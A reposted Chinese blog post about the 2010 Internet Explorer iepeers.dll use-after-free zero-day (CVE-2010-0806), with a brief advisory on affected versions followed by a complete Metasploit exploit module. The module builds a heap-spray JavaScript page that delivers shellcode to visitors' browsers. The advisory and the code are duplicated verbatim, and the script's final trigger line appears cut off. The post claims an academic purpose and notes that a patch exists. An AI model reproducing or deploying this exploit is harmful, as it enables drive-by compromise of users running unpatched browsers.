该博客为转载内容,转载自https://blog.51cto.com/isun0804/287736 ,涉及PHP、操作系统和JavaScript等信息技术领域。
IE 0day 漏洞 iepeers.dll(网马首选波及用户较广)
发表时间:2010-3-10
kb981374橙色预警
IE浏览器再现新0day漏洞,该漏洞可能允许远程执行代码,***利用该漏洞可以制造一个特别的页面,再通过电子邮件、IM消息或其它欺骗的方式,诱使用 户访问这个特殊的页面而触发。
一 漏洞发展:
2010.3.10 微软发布安全公告kb981374,并表示要发布额外补丁修复该漏洞(通常情况下,微软只有特别严重的安全漏洞才会启动额外补丁发布流程。)
二、漏洞简述:
此IE新漏洞存在于iepeers.dll组件中,影响IE6/ie7 该漏洞已经在地下黑市交易,IE8不会受此漏洞影响。
三、漏洞影响:
1 主要影响用户:
xp ie6/ie7用户
2 可能受影响用户
vista ie7保护模式减少影响
win2003 ie7受限模式可以减少影响
3 不受影响用户
IE8用户
win2000 ie5用户
代码:
# Title: Microsoft Internet Explorer iepeers.dll Use-After-Free Exploit (meta)
# EDB-ID: 11683
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Trancer
# Published: 2010-03-10
# Verified: yes
# Download Exploit Code
# Download N/A
view sourceprint?##
# ie_iepeers_pointer.rb
# Microsoft Internet Explorer iepeers.dll use-after-free exploit for the Metasploit Framework
# Tested successfully on the following platforms:
# - Microsoft Internet Explorer 7, Windows Vista SP2
# - Microsoft Internet Explorer 7, Windows XP SP3
# - Microsoft Internet Explorer 6, Windows XP SP3
# Exploit found in-the-wild. For additional details:
# http://www.rec-sec.com/2010/03/10/internet-explorer-iepeers-use-after-free-exploit/
# Trancer
# http://www.rec-sec.com
##
require ''msf/core''
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
''Name'' => ''Microsoft Internet Explorer iepeers.dll use-after-free'',
''Description'' => %q{
This module exploits a use-after-free vulnerability within iepeers.dll of
Microsoft Internet Explorer versions 6 and 7.
NOTE: Internet Explorer 8 and Internet Explorer 5 are not affected.
},
''License'' => MSF_LICENSE,
''Author'' => [
''Trancer <mtrancer[at]gmail.com>''
],
''Version'' => ''$Revision:$'',
''References'' =>
[
[ ''CVE'', ''2010-0806'' ],
[ ''OSVDB'', ''62810'' ],
[ ''BID'', ''38615'' ],
[ ''URL'', ''http://www.microsoft.com/technet/security/advisory/981374.mspx'' ],
[ ''URL'', ''http://www.avertlabs.com/research/blog/index.php/2010/03/09/targeted-internet-explorer-0day
-attack-announced-cve-2010-0806/'' ]
],
''DefaultOptions'' =>
{
''EXITFUNC'' => ''process'',
''InitialAutoRunScript'' => ''migrate -f'',
},
''Payload'' =>
{
''Space'' => 1024,
''BadChars'' => "\x00\x09\x0a\x0d''\\",
''StackAdjustment'' => -3500,
},
''Platform'' => ''win'',
''Targets'' =>
[
[ ''Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0'', { ''Ret'' => 0x0C0C0C0C } ]
],
''DisclosureDate'' => ''Mar 09 2010'',
''DefaultTarget'' => 0))
end
def on_request_uri(cli, request)
# Re-generate the payload
return if ((p = regenerate_payload(cli)) == nil)
# Encode the shellcode
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Set the return\nops
ret = Rex::Text.to_unescape([target.ret].pack(''V''))
# Randomize the javascript variable names
j_shellcode = rand_text_alpha(rand(100) + 1)
j_nops = rand_text_alpha(rand(100) + 1)
j_slackspace = rand_text_alpha(rand(100) + 1)
j_fillblock = rand_text_alpha(rand(100) + 1)
j_memory = rand_text_alpha(rand(100) + 1)
j_counter = rand_text_alpha(rand(30) + 2)
j_ret = rand_text_alpha(rand(100) + 1)
j_array = rand_text_alpha(rand(100) + 1)
j_function1 = rand_text_alpha(rand(100) + 1)
j_function2 = rand_text_alpha(rand(100) + 1)
j_object = rand_text_alpha(rand(100) + 1)
j_id = rand_text_alpha(rand(100) + 1)
# Build out the message
html = %Q|<html><body>
<button id=''#{j_id}'' style=''display:none''></button>
<script language=''javascript''>
function #{j_function1}(){
var #{j_shellcode} = unescape(''#{shellcode}'');
#{j_memory} = new Array();
var #{j_slackspace} = 0x86000-(#{j_shellcode}.length*2);
var #{j_nops} = unescape(''#{ret}'');
while(#{j_nops}.length<#{j_slackspace}/2) { #{j_nops}+=#{j_nops}; }
var #{j_fillblock} = #{j_nops}.substring(0,#{j_slackspace}/2);
delete #{j_nops};
for(#{j_counter}=0; #{j_counter}<270; #{j_counter}++) {
#{j_memory}[#{j_counter}] = #{j_fillblock} + #{j_fillblock} + #{j_shellcode};
}
}
function #{j_function2}(){
#{j_function1}();
var #{j_object} = document.createElement(''body'');
#{j_object}.addBehavior(''#default#userData'');
document.appendChild(#{j_object});
try {
for (#{j_counter}=0; #{j_counter}<10; #{j_counter}++) {
#{j_object}.setAttribute(''s'',window);
}
} catch(e){ }
window.status+='''';
}
document.getElementById(''#{j_id}'').
</script></body></html>|
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
# Transmit the compressed response to the client
send_response(cli, html, { ''Content-Type'' => ''text/html'' })
# Handle the payload
handler(cli)
end
end
PS:放出代码的原因就是补丁已发布,请大家及时打上否则你就惨了!
发表时间:2010-3-10
kb981374橙色预警
IE浏览器再现新0day漏洞,该漏洞可能允许远程执行代码,***利用该漏洞可以制造一个特别的页面,再通过电子邮件、IM消息或其它欺骗的方式,诱使用 户访问这个特殊的页面而触发。
一 漏洞发展:
2010.3.10 微软发布安全公告kb981374,并表示要发布额外补丁修复该漏洞(通常情况下,微软只有特别严重的安全漏洞才会启动额外补丁发布流程。)
二、漏洞简述:
此IE新漏洞存在于iepeers.dll组件中,影响IE6/ie7 该漏洞已经在地下黑市交易,IE8不会受此漏洞影响。
三、漏洞影响:
1 主要影响用户:
xp ie6/ie7用户
2 可能受影响用户
vista ie7保护模式减少影响
win2003 ie7受限模式可以减少影响
3 不受影响用户
IE8用户
win2000 ie5用户
代码:
# Title: Microsoft Internet Explorer iepeers.dll Use-After-Free Exploit (meta)
# EDB-ID: 11683
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Trancer
# Published: 2010-03-10
# Verified: yes
# Download Exploit Code
# Download N/A
view sourceprint?##
# ie_iepeers_pointer.rb
# Microsoft Internet Explorer iepeers.dll use-after-free exploit for the Metasploit Framework
# Tested successfully on the following platforms:
# - Microsoft Internet Explorer 7, Windows Vista SP2
# - Microsoft Internet Explorer 7, Windows XP SP3
# - Microsoft Internet Explorer 6, Windows XP SP3
# Exploit found in-the-wild. For additional details:
# http://www.rec-sec.com/2010/03/10/internet-explorer-iepeers-use-after-free-exploit/
# Trancer
# http://www.rec-sec.com
##
require ''msf/core''
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
''Name'' => ''Microsoft Internet Explorer iepeers.dll use-after-free'',
''Description'' => %q{
This module exploits a use-after-free vulnerability within iepeers.dll of
Microsoft Internet Explorer versions 6 and 7.
NOTE: Internet Explorer 8 and Internet Explorer 5 are not affected.
},
''License'' => MSF_LICENSE,
''Author'' => [
''Trancer <mtrancer[at]gmail.com>''
],
''Version'' => ''$Revision:$'',
''References'' =>
[
[ ''CVE'', ''2010-0806'' ],
[ ''OSVDB'', ''62810'' ],
[ ''BID'', ''38615'' ],
[ ''URL'', ''http://www.microsoft.com/technet/security/advisory/981374.mspx'' ],
[ ''URL'', ''http://www.avertlabs.com/research/blog/index.php/2010/03/09/targeted-internet-explorer-0day
-attack-announced-cve-2010-0806/'' ]
],
''DefaultOptions'' =>
{
''EXITFUNC'' => ''process'',
''InitialAutoRunScript'' => ''migrate -f'',
},
''Payload'' =>
{
''Space'' => 1024,
''BadChars'' => "\x00\x09\x0a\x0d''\\",
''StackAdjustment'' => -3500,
},
''Platform'' => ''win'',
''Targets'' =>
[
[ ''Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0'', { ''Ret'' => 0x0C0C0C0C } ]
],
''DisclosureDate'' => ''Mar 09 2010'',
''DefaultTarget'' => 0))
end
def on_request_uri(cli, request)
# Re-generate the payload
return if ((p = regenerate_payload(cli)) == nil)
# Encode the shellcode
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Set the return\nops
ret = Rex::Text.to_unescape([target.ret].pack(''V''))
# Randomize the javascript variable names
j_shellcode = rand_text_alpha(rand(100) + 1)
j_nops = rand_text_alpha(rand(100) + 1)
j_slackspace = rand_text_alpha(rand(100) + 1)
j_fillblock = rand_text_alpha(rand(100) + 1)
j_memory = rand_text_alpha(rand(100) + 1)
j_counter = rand_text_alpha(rand(30) + 2)
j_ret = rand_text_alpha(rand(100) + 1)
j_array = rand_text_alpha(rand(100) + 1)
j_function1 = rand_text_alpha(rand(100) + 1)
j_function2 = rand_text_alpha(rand(100) + 1)
j_object = rand_text_alpha(rand(100) + 1)
j_id = rand_text_alpha(rand(100) + 1)
# Build out the message
html = %Q|<html><body>
<button id=''#{j_id}'' style=''display:none''></button>
<script language=''javascript''>
function #{j_function1}(){
var #{j_shellcode} = unescape(''#{shellcode}'');
#{j_memory} = new Array();
var #{j_slackspace} = 0x86000-(#{j_shellcode}.length*2);
var #{j_nops} = unescape(''#{ret}'');
while(#{j_nops}.length<#{j_slackspace}/2) { #{j_nops}+=#{j_nops}; }
var #{j_fillblock} = #{j_nops}.substring(0,#{j_slackspace}/2);
delete #{j_nops};
for(#{j_counter}=0; #{j_counter}<270; #{j_counter}++) {
#{j_memory}[#{j_counter}] = #{j_fillblock} + #{j_fillblock} + #{j_shellcode};
}
}
function #{j_function2}(){
#{j_function1}();
var #{j_object} = document.createElement(''body'');
#{j_object}.addBehavior(''#default#userData'');
document.appendChild(#{j_object});
try {
for (#{j_counter}=0; #{j_counter}<10; #{j_counter}++) {
#{j_object}.setAttribute(''s'',window);
}
} catch(e){ }
window.status+='''';
}
document.getElementById(''#{j_id}'').
</script></body></html>|
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
# Transmit the compressed response to the client
send_response(cli, html, { ''Content-Type'' => ''text/html'' })
# Handle the payload
handler(cli)
end
end
PS:放出代码的原因就是补丁已发布,请大家及时打上否则你就惨了!
友情提示:该代码具有危险性慎用!
郑重声明:本人提供BUG资料仅做学术交流之用,不承担任何因此而引发的一系列法律责任,望周知!
转载于:https://blog.51cto.com/isun0804/287736
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
